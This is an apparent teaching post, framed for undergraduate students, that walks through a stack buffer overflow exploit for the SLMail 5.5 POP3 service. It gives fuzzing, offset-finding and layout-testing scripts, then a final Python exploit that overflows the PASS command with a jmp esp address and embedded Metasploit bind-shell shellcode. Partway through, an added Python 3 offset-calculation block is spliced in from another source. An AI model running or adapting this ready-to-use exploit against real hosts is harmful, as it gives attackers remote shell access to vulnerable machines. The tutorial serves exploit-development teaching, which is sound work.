John Pierce, CISSP, SLAE, Security+

Buffer Overflow of SLMail 5.5.0.4433 - full development

This video was developed to show my first-year undergraduate students an example of how to develop a buffer overflow exploit. It is a demonstration of a vulnerability discovered and published by Muts in 2004, exploited on a Windows XP SP3 machine using Python, Immunity Debugger, and Metasploit.

If you can't view the original Flash video on your device, you can get the mp4 version here.

Code from the video follows:

First attempt at fuzzing, to confirm the overflow exists and get a rough idea of the string length that triggers it:

#!/usr/bin/python

import socket

# create an array of buffers of varying lengths (2020, 2120, ... up to 30 entries)

buffer = ["A"]
counter = 2020
while len(buffer) <= 30:
	buffer.append("A"*counter)
	counter = counter + 100

# now we step through the buffers; once the service has crashed the next
# connect() fails, so report where that happened instead of dying with a traceback

for string in buffer:
	print "Sending buffer length "+str(len(string))
	try:
		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect(('172.16.32.110',110))
		s.recv(1024)
		s.send("USER john\r\n")
		s.recv(1024)
		s.send("PASS "+string+"\r\n")
		s.recv(1024)
		s.send("QUIT\r\n")
		s.close()
	except socket.error:
		print "Connection failed at length "+str(len(string))+" - the previous buffer probably crashed the service"
		break

Now find which part of the string lands in each register that can be controlled, by sending a unique cyclic pattern instead of repeated A's:

#!/usr/bin/python

import socket

# a non-repeating cyclic pattern (Metasploit pattern_create): every 4-byte
# window is unique, so the bytes that land in EIP/ESP identify their offset

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2D"
print "Sending buffer length "+str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('172.16.32.110',110))
s.recv(1024)
s.send("USER john\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()
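The offset lookup that the pattern above is used for, as an added Python 3 example that is not part of the original post: it regenerates the cyclic pattern, finds where a register value read in the debugger sits in it, and packs a return address in little-endian order. The EIP value 0x39694438 is derived here from the post's stated EIP offset of 2606 (it is the four pattern bytes at that offset read as a little-endian dword), and the 2700-byte pattern length is this example's own choice.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...Aa9Ab0...) cut to `length` bytes."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, reg_value):
    """Find where a 32-bit register value read in the debugger came from.

    x86 is little-endian, so EIP=0x39694438 was loaded from the bytes
    '8Di9' in memory order; struct.pack('<I') undoes that before searching.
    Returns -1 when the value is not from the pattern (e.g. 0x41414141).
    """
    needle = struct.pack("<I", reg_value).decode("ascii", "replace")
    return pattern.find(needle)


def pack_ret(address):
    """Return address in the byte order it must appear in the buffer."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    pat = pattern_create(2700)                  # length chosen for this example
    eip = 0x39694438                            # derived from the post's EIP offset of 2606
    print("EIP offset:", pattern_offset(pat, eip))   # 2606
    print("ESP bytes:", pat[2610:2613])              # Dj0 (offset 2610, as the post states)
    print("jmp esp:", pack_ret(0x7E429353))          # b'S\x93B~' == '\x53\x93\x42\x7e'
```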

Test the layout to make sure everything lands where expected before putting in the shellcode:

#!/usr/bin/python

import socket

# 2602 bytes of padding, then BBBB should land in EBP, CCCC in EIP,
# and the D/E bytes should sit where ESP points

buffer = "A"*2602 + "BBBB" + "CCCC" + "D" * 10 + "E" * 1000
print "Sending buffer length "+str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('172.16.32.110',110))
s.recv(1024)
s.send("USER john\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()
And here's the final exploit:

#!/usr/bin/python

import socket

# layout: 2602 bytes of padding reach EBP, the 4 bytes at offset 2606 land in EIP,
# and ESP points at offset 2610, leaving 424 bytes for the shellcode
# the jmp esp instruction in user32.dll is at 0x7e429353 (written little-endian below)
'''
/*
 * windows/shell_bind_tcp - 424 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * NOP gen: x86/opty2
 * AutoRunScript=, EXITFUNC=thread, InitialAutoRunScript=, 
 * LPORT=4444, RHOST=
 */
'''
shellcode = ("\xb3\xe0\x05\xa9\x4b\x74\x0c\xa8\x1d\x66\x42\x3f\x27\x13\xd5"
"\x14\x4e\x86\xfd\x43\xbf\x9b\x8d\x41\x2f\x99\xba\xb4\x40\x90"
"\x3c\xb2\xb8\xb6\x1c\x15\x98\xb5\x34\xc0\xf8\x93\x37\xd4\x85"
"\xf9\x49\x2d\xb7\x24\x67\x04\x9f\x4f\x4a\x97\xd9\xf6\xbb\x2c"
"\xae\x03\x18\xd9\x74\x24\xf4\x33\xc9\xb1\x56\x5e\x31\x5e\x18"
"\x03\x5e\x18\x83\xee\xd0\x4c\xf6\xe4\xc0\x18\xf9\x14\x10\x7b"
"\x73\xf1\x21\xa9\xe7\x71\x13\x7d\x63\xd7\x9f\xf6\x21\xcc\x14"
"\x7a\xee\xe3\x9d\x31\xc8\xca\x1e\xf4\xd4\x81\xdc\x96\xa8\xdb"
"\x30\x79\x90\x13\x45\x78\xd5\x4e\xa5\x28\x8e\x05\x17\xdd\xbb"
"\x58\xab\xdc\x6b\xd7\x93\xa6\x0e\x28\x67\x1d\x10\x79\xd7\x2a"
"\x5a\x61\x5c\x74\x7b\x90\xb1\x66\x47\xdb\xbe\x5d\x33\xda\x16"
"\xac\xbc\xec\x56\x63\x83\xc0\x5b\x7d\xc3\xe7\x83\x08\x3f\x14"
"\x3e\x0b\x84\x66\xe4\x9e\x19\xc0\x6f\x38\xfa\xf0\xbc\xdf\x89"
"\xff\x09\xab\xd6\xe3\x8c\x78\x6d\x1f\x05\x7f\xa2\xa9\x5d\xa4"
"\x66\xf1\x06\xc5\x3f\x5f\xe9\xfa\x20\x07\x56\x5f\x2a\xaa\x83"
"\xd9\x71\xa3\x60\xd4\x89\x33\xee\x6f\xf9\x01\xb1\xdb\x95\x29"
"\x3a\xc2\x62\x4d\x11\xb2\xfd\xb0\x99\xc3\xd4\x76\xcd\x93\x4e"
"\x5e\x6d\x78\x8f\x5f\xb8\x2f\xdf\xcf\x12\x90\x8f\xaf\xc2\x78"
"\xda\x3f\x3d\x98\xe5\x95\x48\x9e\x2b\xcd\x19\x49\x4e\xf1\x8c"
"\xd5\xc7\x17\xc4\xf5\x81\x80\x70\x34\xf6\x18\xe7\x47\xdc\x34"
"\xb0\xdf\x68\x53\x06\xdf\x68\x71\x25\x4c\xc0\x12\xbd\x9e\xd5"
"\x03\xc2\x8a\x7d\x4d\xfb\x5d\xf7\x23\x4e\xff\x08\x6e\x38\x9c"
"\x9b\xf5\xb8\xeb\x87\xa1\xef\xbc\x76\xb8\x65\x51\x20\x12\x9b"
"\xa8\xb4\x5d\x1f\x77\x05\x63\x9e\xfa\x31\x47\xb0\xc2\xba\xc3"
"\xe4\x9a\xec\x9d\x52\x5d\x47\x6c\x0c\x37\x34\x26\xd8\xce\x76"
"\xf9\x9e\xce\x52\x8f\x7e\x7e\x0b\xd6\x81\x4f\xdb\xde\xfa\xad"
"\x7b\x20\xd1\x75\x9b\xc3\xf3\x83\x34\x5a\x96\x29\x59\x5d\x4d"
"\x6d\x64\xde\x67\x0e\x93\xfe\x02\x0b\xdf\xb8\xff\x61\x70\x2d"
"\xff\xd6\x71\x64")

buffer = "A"*2602 + "BBBB" + '\x53\x93\x42\x7e' + shellcode

print "Sending buffer length "+str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.56.101',110))
s.recv(1024)
s.send("USER john\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()
